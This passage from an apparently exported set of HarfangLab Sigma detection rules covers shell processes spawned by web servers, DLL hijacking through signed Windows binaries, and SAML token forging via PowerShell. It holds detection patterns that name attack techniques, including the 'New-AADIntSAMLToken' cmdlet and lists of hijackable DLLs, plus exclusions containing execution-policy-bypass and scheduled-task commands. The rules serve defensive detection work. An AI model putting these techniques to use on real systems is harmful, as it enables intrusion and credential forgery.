'?:\\Windows\\system32\\cmd.exe /c ver'\n ParentImage: '?:\\Program Files (x86)\\Fortinet\\FortiClientEMS\\Apache24\\bin\\httpd.exe'\n\n exclusion_mcafee_epo:\n ParentImage: '?:\\Program Files (x86)\\McAfee\\ePolicy Orchestrator\\Server\\bin\\tomcat?.exe'\n # cmd.exe /c chcp 1252 > NUL & powershell.exe -ExecutionPolicy Bypass -NoExit -NoProfile -Command -\n CommandLine: 'cmd.exe /c chcp 1252 > NUL & powershell.exe -ExecutionPolicy Bypass -NoExit -NoProfile -Command -'\n\n exclusion_cti_server:\n # cwd : D:\\cti_server\\conf\\caddy\\sites-enabled\\iCTI_314\\modules\\rh\\\n CommandLine:\n - 'cmd.exe /c git describe 2>&1'\n - 'cmd.exe /c git status --porcelain'\n\n exclusion_sygid5:\n CommandLine: 'cmd.exe /c ipconfig /all'\n CurrentDirectory: '*\\sygid5*'\n\n exclusion_iagona:\n # cmd.exe /c C:/iagona/www/neoscreen/rest/apk/aapt.exe dump badging C:/iagona/www/neoscreen/rest/apk/app-release.apk\n # cmd.exe /s /c C:/iagona/www/neoscreen/rest/apk/aapt.exe dump badging C:/iagona/www/neoscreen/rest/apk/app-release.apk\n # cmd.exe /c E:/iagona/www/neoscreen/rest/apk/aapt.exe dump badging E:/iagona/www/neoscreen/rest/apk/app-release.apk\n CommandLine|endswith: ':/iagona/www/neoscreen/rest/apk/aapt.exe dump badging ?:/iagona/www/neoscreen/rest/apk/app-release.apk'\n\n exclusion_rotatelogs:\n CommandLine:\n - '?:\\Windows\\system32\\cmd.exe /C bin\\rotatelogs *'\n - '?:\\Windows\\system32\\cmd.exe /C bin\\rotatelogs.exe *'\n - '?:\\Windows\\system32\\cmd.exe /C *\\bin\\rotatelogs.exe *'\n - '?:\\Windows\\system32\\cmd.exe /C {SRVROOT}\\bin\\rotatelogs.exe *'\n\n # https://twitter.com/SBousseaden/status/1408787624060506113\n exclusion_third_party:\n CommandLine:\n - '*\\rundll32.exe --eoim'\n - '*\\rundll32.exe --enable-speech-input --auto-scan-plugin --enable-media-stream*'\n - '*\\rundll32.exe --enable-speech-input --auto-scan-plugin --lang=* --enable-media-stream*'\n\n exclusion_sendmail:\n CommandLine:\n - 'cmd.exe /s /c sendmail.exe'\n - 'cmd.exe /s /c ?:\\xampp\\sendmail\\sendmail.exe'\n - 'cmd.exe /c *\\sendmail\\sendmail.exe -t'\n - 'cmd.exe /c /usr/sbin/sendmail -oi -f*@* -t'\n\n exclusion_php:\n CommandLine:\n - 'cmd.exe /c */bin/php/php?.?.??/php.exe -r print^(var_export^(get_loaded_extensions^(^),true^)^)^;'\n - 'cmd.exe /c */bin/php/php?.?.??/php.exe -c */bin/php.ini -r print^(var_export^(get_loaded_extensions^(^),true^)^)^;'\n - 'cmd.exe /s /c */bin/php/php?.?.??/php.exe -r print^(var_export^(get_loaded_extensions^(^),true^)^)^;'\n - 'cmd.exe /s /c */bin/php/php?.?.??/php.exe -c */bin/php.ini -r print^(var_export^(get_loaded_extensions^(^),true^)^)^;'\n\n exclusion_tomcat:\n CommandLine:\n - 'sh *\\GRANGLE\\\\*\\tomcat\\\\*'\n - 'sh.exe *\\GRANGLE\\\\*\\tomcat\\\\*'\n - 'cmd.exe /C cscript.exe ?:\\Program Files\\Apache Software Foundation\\Tomcat*\\temp\\service*.vbs'\n\n exclusion_magicinfo:\n CommandLine|startswith: 'cmd /c copy *\\MagicInfo Premium\\runtime'\n\n exclusion_dakota:\n CommandLine: 'cmd /c powershell -ExecutionPolicy RemoteSigned -noprofile -noninteractive Get-WebBinding -Name Dakota -Protocol https | select -ExpandProperty bindingInformation'\n\n exclusion_vmware:\n CommandLine|startswith: 'cmd /c VMwareToolboxCmd.exe stat'\n\n exclusion_converters:\n CommandLine|startswith:\n - 'cmd.exe /c pdftk '\n - 'cmd.exe /c pdftk.exe '\n - 'cmd.exe /s /c pdftk '\n - 'cmd.exe /s /c pdftk^ '\n - 'cmd.exe /s /c pdftk.exe '\n - 'cmd.exe /c ffmpeg '\n - 'cmd.exe */c *\\wkhtmltopdf.exe '\n - 'cmd.exe */c */wkhtmltopdf.exe '\n - 'cmd * /C */wkhtmltopdf.exe '\n - 'cmd.exe /c *ImageGen/ImageGen.exe'\n - 'cmd.exe /c imagemagick\\convert.exe '\n - 'cmd.exe /s /c */bin/ImageMagick*/convert '\n - 'cmd.exe /c ?:*Program Files*\\ImageMagick-*\\convert.exe '\n - 'cmd.exe /c ?:*Program Files (x86)*\\ImageMagick-*\\convert.exe '\n - 'cmd.exe /c convert -version'\n - 'cmd.exe /c pdfinfo -v 2>&1'\n - '*cmd.exe /c ?:\\Program Files\\Vital Images\\\\*\\bin\\\\*Converter.bat'\n - 'cmd.exe /c *\\iCTI_convert_druide.exe '\n - 'cmd.exe /c \"?:\\Program Files\\ImageMagick-*\\convert.exe'\n - 'cmd.exe /c \"?:\\Program Files (x86)\\ImageMagick-*\\convert.exe'\n - 'cmd.exe /c *\\ImageMagick-*\\montage.exe'\n - 'cmd.exe /c ?:\\Program Files\\LibreOffice\\program\\python ?:\\Program Files\\LibreOffice\\program\\unoconv.py'\n - 'cmd.exe /c */bin/pdftk.exe '\n - 'cmd.exe /c java * ?:\\Program Files\\pdfsam\\lib\\pdfsam*'\n - 'cmd.exe /c java * ?:\\Program Files (x86)\\pdfsam\\lib\\pdfsam*'\n - 'cmd.exe /c *\\converter\\iconv.exe'\n # - 'cmd.exe /c where *convert'\n\n exclusion_ssafe:\n CommandLine|startswith: 'cmd.exe /s /c schtasks /Create /tn SSafe_RSTART /tr ?:\\Windows\\TEMP/_ssf_svc_.bat'\n\n exclusion_loaded_extension_monitoring:\n CommandLine|contains: 'print^(var_export^(get_loaded_extensions^(^),true^)^)^;'\n\n exclusion_backup:\n CommandLine: 'cmd.exe /s /c mysqldump'\n\n exclusion_delete_schtasks:\n CommandLine|startswith: 'cmd.exe /s /c schtasks /delete /TN'\n\n exclusion_neoplayer:\n CommandLine|startswith: 'cmd.exe /c */neoplayer/rest/apk/aapt.exe dump'\n\n exclusion_swish_e:\n CommandLine: 'cmd.exe /c *\\SWISH-E\\bin\\swish-e.exe -f *'\n\n exclusion_thumbnailer:\n CommandLine|startswith: 'cmd.exe /c evince-thumbnailer '\n\n exclusion_tmp_cleanup:\n CommandLine:\n - '?:\\windows\\system32\\cmd.exe /C del /S /Q ?:\\windows\\TEMP\\tmp_*.ps1xml'\n - '?:\\windows\\system32\\cmd.exe /C del /S /Q ?:\\windows\\TEMP\\tmp_*.psd1'\n - '?:\\windows\\system32\\cmd.exe /C del /S /Q ?:\\windows\\TEMP\\tmp_*.psm1'\n\n exclusion_soffice:\n CommandLine: 'cmd /C tasklist | find soffice'\n\n exclusion_t2ttechnologies:\n CommandLine|startswith: 'cmd.exe /c ?:\\Program Files\\T2Technology\\T2MasterPrint\\'\n\n exclusion_berger_levrault:\n CommandLine:\n - '?:\\Windows\\system32\\cmd.exe /c *\\Berger-Levrault\\\\*\\server_dsn-val_*.bat*.dsn *\\eGRH\\Fusions\\\\* */Berger-Levrault/*'\n - '?:\\Windows\\system32\\cmd.exe /c *\\Berger-Levrault\\\\*\\server_jps.bat */Berger-Levrault/*'\n\n\n exclusion_pipelog:\n CommandLine: '?:\\Windows\\system32\\cmd.exe /C bin\\pipelog.exe httpd_*'\n\n exclusion_medifirst_genetics:\n CommandLine|contains|all:\n - 'cmd.exe /c java'\n - '/mdfapp/genetics'\n - '/mdf/var/medifirst_genetics/'\n\n exclusion_urouter:\n CommandLine|startswith: 'CMD /C wmic process where (name=userver.exe or name=urouter.exe)'\n\n exclusion_hexaflux:\n CommandLine:\n - 'cmd /c sc query hexaflux_console.exe'\n - 'cmd /c sc query hexaflux'\n\n exclusion_incotec:\n CommandLine: '?:\\Windows\\system32\\cmd.exe /c *\\IncoRunEnv.bat VcmRptJob.exe * /Inco_Identity:*'\n\n exclusion_quadientmas:\n CommandLine|startswith:\n - 'cmd.exe /c ?:\\Program Files (x86)\\QuadientMAS\\services\\'\n - 'cmd.exe /c ?:/Program Files (x86)/QuadientMAS/services/'\n - 'cmd.exe /c icacls ?:\\Program Files (x86)\\QuadientMAS\\data\\user* /t /grant'\n\n exclusion_neomas:\n CommandLine|startswith: 'cmd.exe /c ?:/Program Files (x86)/NeopostMAS/'\n\n exclusion_wamp:\n CommandLine: 'cmd.exe /c CMD /D /C powershell [System.Text.Encoding]::Default'\n\n exclusion_cvi42:\n GrandparentImage|endswith: '\\httpd.exe'\n ParentImage|endswith: '\\php-cgi.exe'\n CommandLine|contains: '?:\\Program Files\\cvi42\\report\\\\???\\'\n\n exclusion_aras_innovator:\n CommandLine: 'cmd.exe /c node updateOrCompile.js'\n CurrentDirectory|endswith: '\\Aras\\PRD\\Innovator\\Client\\nodejs\\'\n\n exclusion_ovidentia:\n CurrentDirectory: '?:\\inetpub\\wwwroot\\ovidentia\\'\n CommandLine:\n - 'cmd.exe /c ffmpeg -version > /dev/null 2>&1'\n - 'cmd.exe /c pdfinfo -v 2>&1'\n - 'cmd.exe /c convert -version'\n\n exclusion_ifilter:\n CommandLine: 'cmd.exe /s /c *\\iFilterConsole64.exe -f *.pdf'\n\n exclusion_carl:\n CommandLine:\n - 'cmd /s /c icacls *\\CSAdmin\\tmp\\tmp_*\\\\* /GRANT:r *'\n - 'cmd /s /c DEL *\\CSAdmin\\tmp\\tmp_*\\\\* 1>nul & RMDIR /S /Q *\\CSAdmin\\tmp\\tmp_*\\\\*'\n - 'cmd /s /c *\\bin\\java -classpath *\\CSAdmin/distrib/work\\carlsource/*/install/lib/*com.carl.xnet.starter.ObfuscatorCli*'\n\n exclusion_rtm:\n CommandLine:\n - 'cmd.exe /c sc query RTM Historian | FIND STATE'\n - 'cmd.exe /c sc query RTM RTMReporter | FIND STATE'\n - 'cmd.exe /c sc query RTM Scheduler | FIND STATE'\n - 'cmd.exe /c sc stop RTM RTMReporter'\n\n exclusion_openbee:\n CommandLine|startswith: 'cmd.exe /c ?:\\Program Files (x86)\\OpenBee\\OpenBeePortal*\\Apache*\\'\n\n exclusion_sap:\n CommandLine|startswith: 'cmd /c icacls ?:\\Program Files (x86)\\SAP\\SAP Business One ServerTools\\SCSWWorkingShare'\n\n exclusion_talentia:\n CommandLine|startswith: 'cmd.exe /c *\\Talentia\\portailDsn\\\\*\\webapps\\portailDsn\\WEB-INF\\classes'\n\n exclusion_userver:\n CommandLine|startswith: 'CMD /C wmic process where name=userver.exe get commandline '\n\n exclusion_jalios_cms:\n # https://community.jalios.com/jcms/jc2_183627/fr/script-pdf2svg2-bat?details=true\n # C:\\Windows\\system32\\cmd.exe /c C:\\Tools\\poppler-0.68\\bin\\pdf2svg2.bat....\n CommandLine: '?:\\Windows\\system32\\cmd.exe /c *poppler*\\bin\\pdf2svg2.bat *'\n\n exclusion_mdfapp:\n # https://github.com/mpdf/mpdf\n CommandLine|contains: '/c /mdf/app/php/bin/php ?:/mdf/mdfapp/genetics/modules/*/stringToBarCode.php'\n\n exclusion_kayleigh:\n CommandLine:\n - 'cmd.exe /c sc query KayleighUniSpooler'\n - 'cmd.exe /c sc query KayleighSPSpooler'\n - 'cmd.exe /c sc query KayleighApacheServer'\n - 'cmd.exe /c sc query KayleighPostgresServer'\n - 'cmd.exe /c sc query KayleighJavaServer'\n\n exclusion_cron:\n CommandLine:\n - 'cmd.exe /s /c ?:\\php\\php-*-nts\\\\php.exe -f ?:/inetpub/wwwroot/logen/library/cron/cron.php ajax'\n - 'cmd.exe /s /c cd c:/inetpub/wwwroot/logen/library/cron/'\n\n condition: all of selection_* and not 1 of exclusion_*\nfalsepositives:\n - Some web applications may spawn a legitimate shell process.\nlevel: high\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "f9ee660e-81ec-4e3b-9897-8e9e23dba22b",
"rule_name": "Shell Process Spawned by Web Server",
"rule_description": "Detects the suspicious invocation of a shell process by a web server\nAttackers can use vulnerabilities present in web applications to execute malicious code on a web server.\nIs is recommended to analyze the executed shell command to determine its legitimacy in the context of the running web application.\n",
"rule_creation_date": "2021-04-01",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1190",
"attack.t1505.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fa2fd701-99ae-44c4-bb90-1f638c009d14",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082150Z",
"creation_date": "2026-03-23T11:45:34.082152Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082157Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_customshellhost.yml",
"content": "title: DLL Hijacking via CustomShellHost.exe\nid: fa2fd701-99ae-44c4-bb90-1f638c009d14\ndescription: |\n Detects potential Windows DLL Hijacking via CustomShellHost.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CustomShellHost.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\propsys.dll'\n - '\\sspicli.dll'\n - '\\userenv.dll'\n - '\\wtsapi32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fa2fd701-99ae-44c4-bb90-1f638c009d14",
"rule_name": "DLL Hijacking via CustomShellHost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via CustomShellHost.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fa33082b-e331-43b5-b919-98c770258fc9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078365Z",
"creation_date": "2026-03-23T11:45:34.078366Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078371Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1606.002/T1606.002.md#atomic-test-1---golden-saml",
"https://attack.mitre.org/techniques/T1606/002/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1606_002_saml_forged_token.yml",
"content": "title: SAML Token Forged via PowerShell\nid: fa33082b-e331-43b5-b919-98c770258fc9\ndescription: |\n Detects the usage of a PowerShell cmdlet related to SAML token forging.\n An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.\n They may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account.\n It is recommended to analyze the process responsible for the forging of token as well as its ancestors for malicious content, and to look for other suspicious activities and authentications following this alert.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1606.002/T1606.002.md#atomic-test-1---golden-saml\n - https://attack.mitre.org/techniques/T1606/002/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/12/23\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1606.002\n - attack.execution\n - attack.t1059.001\n - attack.defense_evasion\n - attack.t1550\n - attack.t1550.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: powershell_event\ndetection:\n selection:\n # cmdlet to forge the token\n PowershellCommand|contains: 'New-AADIntSAMLToken '\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fa33082b-e331-43b5-b919-98c770258fc9",
"rule_name": "SAML Token Forged via PowerShell",
"rule_description": "Detects the usage of a PowerShell cmdlet related to SAML token forging.\nAn adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.\nThey may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account.\nIt is recommended to analyze the process responsible for the forging of token as well as its ancestors for malicious content, and to look for other suspicious activities and authentications following this alert.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1550",
"attack.t1550.001",
"attack.t1606.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fa405235-fe36-482e-8102-ba29c2a94699",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082463Z",
"creation_date": "2026-03-23T11:45:34.082466Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082470Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tracerpt.yml",
"content": "title: DLL Hijacking via TraceRpt.exe\nid: fa405235-fe36-482e-8102-ba29c2a94699\ndescription: |\n Detects potential Windows DLL Hijacking via TraceRpt.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'TraceRpt.Exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbghelp.dll'\n - '\\pdh.dll'\n - '\\wevtapi.dll'\n - '\\xmllite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fa405235-fe36-482e-8102-ba29c2a94699",
"rule_name": "DLL Hijacking via TraceRpt.exe",
"rule_description": "Detects potential Windows DLL Hijacking via TraceRpt.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fa567806-d013-44a4-a7d2-f0d80d501545",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090322Z",
"creation_date": "2026-03-23T11:45:34.090324Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090329Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dstokenclean.yml",
"content": "title: DLL Hijacking via dstokenclean.exe\nid: fa567806-d013-44a4-a7d2-f0d80d501545\ndescription: |\n Detects potential Windows DLL Hijacking via dstokenclean.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dstokenclean.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\dsclient.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fa567806-d013-44a4-a7d2-f0d80d501545",
"rule_name": "DLL Hijacking via dstokenclean.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dstokenclean.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fa5fd8c4-73b1-449f-b1a2-bcc19d728a3a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611998Z",
"creation_date": "2026-03-23T11:45:34.612002Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612009Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://gtfobins.github.io/gtfobins/vim/",
"https://twitter.com/alh4zr3d/status/1631655900560629760?s=46&t=bmL9gNSzs4gNil-zD7vIRg",
"https://attack.mitre.org/techniques/T1543/",
"https://attack.mitre.org/techniques/T1037/"
],
"name": "t1543_vimrc_modified.yml",
